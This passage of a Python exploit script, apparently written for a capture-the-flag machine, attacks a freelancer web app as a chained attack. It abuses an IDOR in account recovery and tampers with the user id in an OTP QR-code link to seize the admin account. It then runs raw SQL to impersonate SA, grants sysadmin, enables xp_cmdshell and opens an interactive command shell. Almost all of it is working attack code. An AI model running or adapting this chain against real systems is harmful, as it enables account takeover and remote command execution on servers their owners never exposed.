    def EmployerLogin(self, user, password):
        path = "/accounts/login/"
        self.getCsrfToken(path)
        r = self.c.post(path, data={
            "csrfmiddlewaretoken": self.csrf_middleware,
            "username": user,
            "password": password
        })
        self.employer_sessionid = r.cookies["sessionid"]
        info(f"success login employer account {user}:{password}")

    def createAccountFreelancer(self, user, passwd):
        path = "/freelancer/register/"
        self.getCsrfToken(path)
        # every free-text field is filled with the username so the security answers are predictable
        self.c.post(path, data={
            "csrfmiddlewaretoken": self.csrf_middleware,
            "username": user,
            "email": f"{user}@gmail.com",
            "first_name": user,
            "last_name": user,
            "address": user,
            "security_q1": user,
            "security_q2": user,
            "security_q3": user,
            "job_title": user,
            "years_of_experience": 33,
            "description": user,
            "password1": passwd,
            "password2": passwd
        }, cookies={
            "csrftoken": self.csrf_token
        }, headers={'Content-Type': 'application/x-www-form-urlencoded'})
        info(f"success create freelancer account {user}:{passwd}")
        self.FreelancerLogin(user, passwd)

    def createAccountEmployer(self, user, passwd):
        path = "/employer/register/"
        self.getCsrfToken(path)
        self.c.post(path, data={
            "csrfmiddlewaretoken": self.csrf_middleware,
            "username": user,
            "email": f"{user}@gmail.com",
            "first_name": user,
            "last_name": user,
            "address": user,
            "security_q1": user,
            "security_q2": user,
            "security_q3": user,
            "company_name": user,
            "password1": passwd,
            "password2": passwd
        }, cookies={
            "csrftoken": self.csrf_token
        }, headers={'Content-Type': 'application/x-www-form-urlencoded'}, follow_redirects=False)
        info(f"success create employer account {user}:{passwd}")

    def ActivateAccountIDOR(self, userEmployer, password):
        # the recovery form is submitted from the freelancer session but names the employer account
        path = "/accounts/recovery/"
        self.getCsrfToken(path)
        self.c.post(path, data={
            "csrfmiddlewaretoken": self.csrf_middleware,
            "username": userEmployer,
            "security_q1": userEmployer,
            "security_q2": userEmployer,
            "security_q3": userEmployer,
        }, cookies={
            "sessionid": self.freelancer_sessionid
        })
        self.EmployerLogin(userEmployer, password)
        return "success activate employer account through idor account recovery"

    def GetQrCode(self, idTakeover):
        path = "/accounts/otp/qrcode/generate/"
        r = self.c.get(path, cookies={
            "sessionid": self.employer_sessionid
        })
        image = Image.open(BytesIO(r.content))
        qr_codes = decode(image)
        for qr_code in qr_codes:
            link = qr_code.data.decode('utf-8')
            match = re.search(r'otp/([^/]+)/', link)
            if match:
                otp_string = match.group(1)
                decoded_otp_string = base64.b64decode(otp_string).decode()
                encoded_idTakeover = base64.b64encode(idTakeover.encode()).decode()
                info(f'changing id for otp {otp_string}:{decoded_otp_string} to {encoded_idTakeover}:{idTakeover}')
                self.adminUrl = link.replace(otp_string, encoded_idTakeover)
                success(f'here the full link {self.adminUrl}, for admin takeover. enjoy it.')
            else:
                error("No match found")

    def LoginAdmin(self):
        r = self.c.get(self.adminUrl)
        self.admin_cookies = r.cookies["sessionid"]

    def QuerySqli(self, query):
        path = "/admin/executeRawSql/"
        self.getCsrfToken("/admin")
        return self.c.post(path, data={
            'query': query,
            'csrfmiddlewaretoken': self.csrf_middleware
        }, cookies={
            'sessionid': self.admin_cookies
        })

    def BypassXpCmdShell(self):
        self.LoginAdmin()
        info(f'admin cookies : {self.admin_cookies}')
        self.QuerySqli("""EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'""")
        self.QuerySqli("""
-- this turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
""")

    def RceSqli(self, cmd):
        rows = self.QuerySqli(f"xp_cmdshell '{cmd}'").json().get('result', {}).get('rows', [])
        for row in rows:
            if len(row) >= 1:
                success(row[0])


if __name__ == "__main__":
    api = API()
    api.createAccountFreelancer('replicannormal', '@Hack4you1337')
    api.createAccountEmployer('replicanlw', '@Hack4you1337')
    info(api.ActivateAccountIDOR('replicanlw', '@Hack4you1337'))
    api.GetQrCode(idTakeover='2')
    info('do u want to get the rce automatically through xp_cmdshell? (y/n)')
    isRce = input('> ')
    if isRce.strip().lower().startswith('y'):
        api.BypassXpCmdShell()
        while True:
            cmd = input('cmd > ')
            api.RceSqli(cmd)
